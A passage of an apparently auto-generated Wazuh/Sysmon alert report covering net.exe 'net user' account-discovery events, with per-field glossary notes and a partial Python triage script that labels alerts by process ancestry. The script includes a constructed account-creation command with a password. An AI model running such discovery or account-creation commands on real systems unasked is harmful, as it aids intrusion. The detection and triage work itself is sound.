No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:42:43.446 ProcessGuid: {94294ddc-be63-680a-290c-000000000e00} ProcessId: 10860 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net user guest CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:42:43.446
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be63-680a-290c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10860
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  net user guest
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3244
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

A net.exe account discovery command was initiated

🧠 What happened? A net.exe account discovery command was initiated

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:51.074+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:51.074+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  A net.exe account discovery command was initiated
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92039
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  12
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy, but it can warn you of high-value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534571.2296727
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:42:43.5556163Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  291066
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:42:43.550 ProcessGuid: {94294ddc-be63-680a-2b0c-000000000e00} ProcessId: 10252 Image: C:\Windows\SysWOW64\net1.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net1.exe CommandLine: C:\WINDOWS\system32\net1 user guest CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 ParentProcessGuid: {94294ddc-be63-680a-290c-000000000e00} ParentProcessId: 10860 ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net user guest ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:42:43.550
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be63-680a-2b0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10252
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\net1 user guest
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-be63-680a-290c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  10860
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  net user guest
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

A net.exe account discovery command was initiated

🧠 What happened? A net.exe account discovery command was initiated

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:51.220+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:51.220+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  A net.exe account discovery command was initiated
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92039
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  13
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy, but it can warn you of high-value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534571.2301808
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:42:43.6117639Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  291075
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:42:43.603 ProcessGuid: {94294ddc-be63-680a-2c0c-000000000e00} ProcessId: 8956 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net user administrator CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:42:43.603
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be63-680a-2c0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8956
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  net user administrator
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3244
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

A net.exe account discovery command was initiated

🧠 What happened? A net.exe account discovery command was initiated

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:51.639+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:51.639+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  A net.exe account discovery command was initiated
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92039
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  14
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy, but it can warn you of high-value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534571.2307087
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event. Microsoft-Windows-Sysmon means this is Sysmon telemetry, not the native Security log.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that provider. This is Sysmon's fixed provider ID; filter on it when the provider name is missing or localised.

data.win.system.eventID:  1
Event ID within the provider's channel. Sysmon 1 = Process Create, the Sysmon counterpart of Security 4688 with richer fields (hashes, parent command line, integrity level).

data.win.system.version:  5
Schema version of this event ID. Tells a parser which field set to expect.

data.win.system.level:  4
ETW level: 1 Critical, 2 Error, 3 Warning, 4 Informational, 5 Verbose. Sysmon Process Create is always 4, so this is not a severity signal.

data.win.system.task:  1
Task category within the provider. For Sysmon it equals the event type (1 = Process Create).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by the provider. Sysmon stamps this same value on every event, so it carries no signal here.

data.win.system.systemTime:  2025-04-24T22:42:43.7162743Z
UTC time the record was written to the channel (100‑ns precision). Use this, not the Wazuh timestamp, to order events on the endpoint; the manager's timestamp is several seconds later because of agent forwarding.

data.win.system.eventRecordID:  291105
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that wrote the event – the Sysmon service itself, not the process being reported.

data.win.system.threadID:  4740
Thread in the Sysmon service that wrote the event. Rarely useful.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record lives in. Export it with wevtutil epl if you need the original .evtx for forensics.

data.win.system.computer:  Attacker
Computer name as recorded by Windows. Should match agent.name; a mismatch means a renamed host or an agent enrolled under the wrong name.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:42:43.711 ProcessGuid: {94294ddc-be63-680a-2e0c-000000000e00} ProcessId: 9352 Image: C:\Windows\SysWOW64\net1.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net1.exe CommandLine: C:\WINDOWS\system32\net1 user administrator CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 ParentProcessGuid: {94294ddc-be63-680a-2c0c-000000000e00} ParentProcessId: 8956 ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net user administrator ParentUser: NT AUTHORITY\SYSTEM"
Full rendered Sysmon message. Every data.win.eventdata field below is parsed out of it; read it once to confirm the parse matches.

data.win.eventdata.utcTime:  2025-04-24 22:42:43.711
Process creation time as seen by Sysmon (UTC, ms). A few ms before systemTime is normal.

data.win.eventdata.processGuid:  {94294ddc-be63-680a-2e0c-000000000e00}
Sysmon's globally unique ID for the new process. Pivot on it to find this process's later events (network, file, DNS) even after the PID is reused.

data.win.eventdata.processId:  9352
PID of the new process. PIDs are recycled, so prefer processGuid for pivots.

data.win.eventdata.image:  C:\Windows\SysWOW64\net1.exe
Full path of the executable. net.exe is a thin launcher that hands most subcommands, including user, to net1.exe, so every net user command produces a net.exe/net1.exe pair. SysWOW64 means the 32‑bit copy ran: the parent chain starts in the 32‑bit Wazuh agent and WOW64 file redirection resolved system32 to SysWOW64.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
Version from the PE resource. 10.0.26100 is the Windows 11 24H2 / Server 2025 build line.

data.win.eventdata.description:  Net Command
Description string from the PE version resource.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product name from the PE version resource. An empty or off‑brand value for a System32 binary is a red flag.

data.win.eventdata.company:  Microsoft Corporation
Company from the PE version resource. Free text, not a signature check.

data.win.eventdata.originalFileName:  net1.exe
Internal name compiled into the binary. Compare with image: a mismatch means a renamed executable.

data.win.eventdata.commandLine:  C:\WINDOWS\system32\net1 user administrator
Exact command line. net1 user administrator prints the built‑in Administrator account's status, last logon and group membership. Read‑only: no password argument, no /add, no /active.

data.win.eventdata.currentDirectory:  C:\Program Files (x86)\ossec-agent\
Working directory of the new process. This is the Wazuh agent's own install directory, a strong hint that the agent (for example its SCA policy scan) launched the command.

data.win.eventdata.user:  NT AUTHORITY\SYSTEM
Account the process runs as. SYSTEM means a service launched it, not an interactive user.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
GUID of the logon session. For user sessions, join it to Security 4624 to see how the session was created; the SYSTEM session has no useful logon event.

data.win.eventdata.logonId:  0x3e7
Logon session ID. 0x3E7 (999) is always the SYSTEM session created at boot.

data.win.eventdata.terminalSessionId:  0
Windows session number. 0 is the services session: no interactive desktop.

data.win.eventdata.integrityLevel:  System
Mandatory integrity level. System is the highest; Medium is a normal user, High an elevated admin.

data.win.eventdata.hashes:  SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
Hash of the image file as configured in Sysmon. Compare it with a known‑good copy of the same build or a reputation source; the same hash recurs for every net1.exe launch in this burst, as expected for one binary.

data.win.eventdata.parentProcessGuid:  {94294ddc-be63-680a-2c0c-000000000e00}
Sysmon GUID of the parent. Join it to another event's processGuid to walk the process tree.

data.win.eventdata.parentProcessId:  8956
PID of the parent process.

data.win.eventdata.parentImage:  C:\Windows\SysWOW64\net.exe
Executable of the parent. Here it is only the net.exe launcher half of the pair; the interesting ancestor is net.exe's own parent one hop further up (for the other net.exe instances in this burst that is wazuh-agent.exe).

data.win.eventdata.parentCommandLine:  net user administrator
Command line of the parent. Same query as the child: net.exe forwards it to net1.exe unchanged.

data.win.eventdata.parentUser:  NT AUTHORITY\SYSTEM
Account the parent runs as.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Treat the net.exe/net1.exe events in this burst as one case. Confirm whether the Wazuh agent's SCA scan spawned them (parent wazuh-agent.exe, SYSTEM, agent directory, same schedule on other agents); if so, document and tune, otherwise escalate as live account discovery.
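An added triage example for the burst of alerts on this page (my code, not SOCscribe's or Wazuh's). It rebuilds the net.exe/net1.exe ancestry from the eventdata fields Wazuh extracts and labels each alert. The first four records are transcribed from this report with GUIDs shortened to their distinguishing segment; the last three are constructed to show the cases the report does not contain (an interactive user under cmd.exe, and an account creation). The "likely-sca" label is an assumption to confirm against the agent's configuration, not a verdict:

```python
"""Triage a burst of Sysmon EID 1 'net.exe account discovery' alerts.

Labels:
  account-change : the net command modifies an account (escalate first)
  likely-sca     : ancestry ends at wazuh-agent.exe, SYSTEM, agent dir
                   (consistent with the agent's own SCA scan; confirm)
  unresolved     : ancestry stops at the net.exe launcher because the
                   parent's own EID 1 event is not in the set (fetch it)
  investigate    : anything else
"""
from collections import Counter

SYSTEM = "NT AUTHORITY\\SYSTEM"
AGENT_DIR = "c:\\program files (x86)\\ossec-agent\\"
MODIFY_FLAGS = ("/add", "/delete", "/del", "/active:", "/expires:")
WAZUH = "C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe"
NET = "C:\\Windows\\SysWOW64\\net.exe"
NET1 = "C:\\Windows\\SysWOW64\\net1.exe"
CMD = "C:\\Windows\\System32\\cmd.exe"   # constructed, not in the report


def ev(guid, parent_guid, image, cmd, parent_image, user=SYSTEM,
       cwd="C:\\Program Files (x86)\\ossec-agent\\"):
    """One alert reduced to the data.win.eventdata fields triage needs."""
    return {"guid": guid, "parent_guid": parent_guid, "image": image,
            "cmd": cmd, "parent_image": parent_image, "user": user, "cwd": cwd}


# First four: transcribed from this report. Last three: constructed.
ALERTS = [
    ev("2e0c", "2c0c", NET1, "C:\\WINDOWS\\system32\\net1 user administrator", NET),
    ev("2f0c", "4900", NET, "net user guest", WAZUH),
    ev("310c", "2f0c", NET1, "C:\\WINDOWS\\system32\\net1 user guest", NET),
    ev("320c", "4900", NET, "net.exe accounts", WAZUH),
    ev("aa01", "bb02", NET, "net user administrator", CMD,
       user="CORP\\jdoe", cwd="C:\\Users\\jdoe\\"),
    ev("aa02", "aa01", NET1, "C:\\WINDOWS\\system32\\net1 user administrator", NET,
       user="CORP\\jdoe", cwd="C:\\Users\\jdoe\\"),
    ev("aa03", "bb02", NET, "net user svc_backup Spring2025! /add", CMD,
       user="CORP\\jdoe", cwd="C:\\Users\\jdoe\\"),
]


def net_args(cmdline):
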